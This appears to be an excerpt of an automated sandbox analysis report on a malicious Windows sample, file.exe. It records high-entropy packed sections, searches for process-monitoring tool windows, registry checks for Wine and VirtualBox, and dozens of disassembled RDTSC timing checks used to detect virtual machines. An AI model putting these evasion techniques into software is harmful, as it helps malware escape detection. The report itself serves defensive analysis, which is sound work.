                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705AB5 push 6515846Ch; mov dword ptr [esp], ebp0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007042B6 push ebp; ret 0_2_007042C5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707AA5 push 256453C2h; mov dword ptr [esp], edi0_2_00707ADA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707AA5 push ecx; mov dword ptr [esp], ebx0_2_00707AFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707AA5 push 089A6BD1h; mov dword ptr [esp], eax0_2_00707B28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705A9D push 197958A1h; mov dword ptr [esp], ecx0_2_00705B5D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705A9D push 6515846Ch; mov dword ptr [esp], ebp0_2_00705BE0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707A81 push 256453C2h; mov dword ptr [esp], edi0_2_00707ADA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707A81 push ecx; mov dword ptr [esp], ebx0_2_00707AFA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00707A81 push 089A6BD1h; mov dword ptr [esp], eax0_2_00707B28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00705A88 push 197958A1h; mov dword ptr [esp], ecx0_2_00705B5D
                Source: file.exeStatic PE information: section name: entropy: 7.933164122793504
                Source: file.exeStatic PE information: section name: goeehmfk entropy: 7.950296707556539

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior

                Malware Analysis System Evasion

                barindex
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 473CDC second address: 473CEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5237 second address: 5F523E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F523E second address: 5F5244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5244 second address: 5F5249 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5249 second address: 5F5253 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6C544CAC2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F566E second address: 5F5674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5674 second address: 5F567A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8F96 second address: 5F8FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F6C54B5854Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8FAE second address: 5F8FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8FB5 second address: 5F9056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F6C54B58546h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push esi 0x0000000e mov ecx, esi 0x00000010 pop ecx 0x00000011 push 00000000h 0x00000013 mov ch, dl 0x00000015 push BC03E034h 0x0000001a push eax 0x0000001b jmp 00007F6C54B58555h 0x00000020 pop eax 0x00000021 add dword ptr [esp], 43FC204Ch 0x00000028 push 00000003h 0x0000002a mov di, F5EBh 0x0000002e push 00000000h 0x00000030 call 00007F6C54B5854Ah 0x00000035 movsx esi, di 0x00000038 pop edx 0x00000039 push ebx 0x0000003a mov ecx, dword ptr [ebp+122D2B47h] 0x00000040 pop ecx 0x00000041 push 00000003h 0x00000043 movzx edx, di 0x00000046 call 00007F6C54B58549h 0x0000004b push ebx 0x0000004c jnl 00007F6C54B58548h 0x00000052 pop ebx 0x00000053 push eax 0x00000054 jmp 00007F6C54B58556h 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d pushad 0x0000005e jp 00007F6C54B58548h 0x00000064 push eax 0x00000065 pop eax 0x00000066 pushad 0x00000067 jmp 00007F6C54B5854Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9056 second address: 5F907A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jne 00007F6C544CAC38h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F907A second address: 5F9090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jg 00007F6C54B58546h 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9090 second address: 5F90E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C544CAC28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b call 00007F6C544CAC37h 0x00000010 mov dword ptr [ebp+122D3880h], ecx 0x00000016 pop ecx 0x00000017 lea ebx, dword ptr [ebp+12458E86h] 0x0000001d mov di, D5CAh 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F6C544CAC31h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d jc 00007F6C544CAC26h 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F90E4 second address: 5F90E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F92FA second address: 5F92FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F92FF second address: 5F936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6C54B58546h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jno 00007F6C54B5854Eh 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F6C54B58550h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jng 00007F6C54B5854Ah 0x00000028 push esi 0x00000029 push edx 0x0000002a pop edx 0x0000002b pop esi 0x0000002c pop eax 0x0000002d movsx edx, cx 0x00000030 push 00000003h 0x00000032 pushad 0x00000033 sbb ebx, 0D8D11FAh 0x00000039 mov ax, bx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000003h 0x00000041 jp 00007F6C54B5854Ch 0x00000047 push 782E5390h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F936A second address: 5F9384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9384 second address: 5F9389 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9389 second address: 5F93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 47D1AC70h 0x0000000e add dword ptr [ebp+122D3C03h], edx 0x00000014 lea ebx, dword ptr [ebp+12458E9Ah] 0x0000001a mov esi, dword ptr [ebp+122D2A1Bh] 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 jnp 00007F6C544CAC37h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F93C6 second address: 5F93E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F6C54B58548h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F93E7 second address: 5F93EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61695E second address: 616966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616AF4 second address: 616AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616AFA second address: 616B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616B03 second address: 616B0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170C6 second address: 6170CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170CC second address: 6170D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170D0 second address: 6170DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170DA second address: 6170E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170E0 second address: 6170E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170E4 second address: 6170ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617655 second address: 617671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F6C54B58546h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617671 second address: 617677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE63A second address: 5DE658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58558h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617EA2 second address: 617EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617EA8 second address: 617EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617FFB second address: 61803C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6C544CAC26h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jbe 00007F6C544CAC26h 0x00000012 js 00007F6C544CAC26h 0x00000018 popad 0x00000019 jg 00007F6C544CAC28h 0x0000001f push edi 0x00000020 pop edi 0x00000021 popad 0x00000022 push eax 0x00000023 push edi 0x00000024 jmp 00007F6C544CAC34h 0x00000029 pop edi 0x0000002a jg 00007F6C544CAC2Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED5DD second address: 5ED604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6C54B58546h 0x0000000a jbe 00007F6C54B58546h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F6C54B58553h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F746 second address: 61F74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621246 second address: 62125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Ah 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62125B second address: 621264 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621264 second address: 621278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C54B58546h 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007F6C54B58546h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF164 second address: 5EF172 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007F6C544CAC26h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF172 second address: 5EF178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF178 second address: 5EF17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625122 second address: 625128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625128 second address: 625142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC31h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625142 second address: 625146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625146 second address: 62514A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625268 second address: 625299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6C54B58553h 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F6C54B58552h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625299 second address: 6252A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F6C544CAC26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62540E second address: 625418 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C54B58546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625418 second address: 62541E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62541E second address: 625424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625424 second address: 62545D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jg 00007F6C544CAC3Ah 0x0000001b jmp 00007F6C544CAC32h 0x00000020 push edx 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jne 00007F6C544CAC26h 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62545D second address: 62547A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6C54B58554h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625925 second address: 625929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625929 second address: 625941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626451 second address: 62645A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626BCD second address: 626BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626BD2 second address: 626BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62735B second address: 627361 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C2E second address: 627C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C34 second address: 627C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C38 second address: 627C5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C5A second address: 627C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628EDF second address: 628EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1FA second address: 62A289 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C54B58546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F6C54B58548h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D3324h], edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F6C54B58548h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F6C54B58548h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 sub dword ptr [ebp+12474F78h], esi 0x0000006b mov si, dx 0x0000006e xchg eax, ebx 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jns 00007F6C54B58546h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A289 second address: 62A296 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A930 second address: 62A946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C54B58551h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBC6 second address: 62CBCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBCC second address: 62CC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F6C54B58548h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jmp 00007F6C54B5854Bh 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3BB1h], edx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F6C54B58548h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c je 00007F6C54B5854Ch 0x00000052 mov esi, dword ptr [ebp+122D2AD3h] 0x00000058 movzx edi, ax 0x0000005b mov si, EED1h 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push edx 0x00000064 pop edx 0x00000065 pop esi 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC48 second address: 62CC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC4F second address: 62CC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jl 00007F6C54B58546h 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62D481 second address: 62D487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
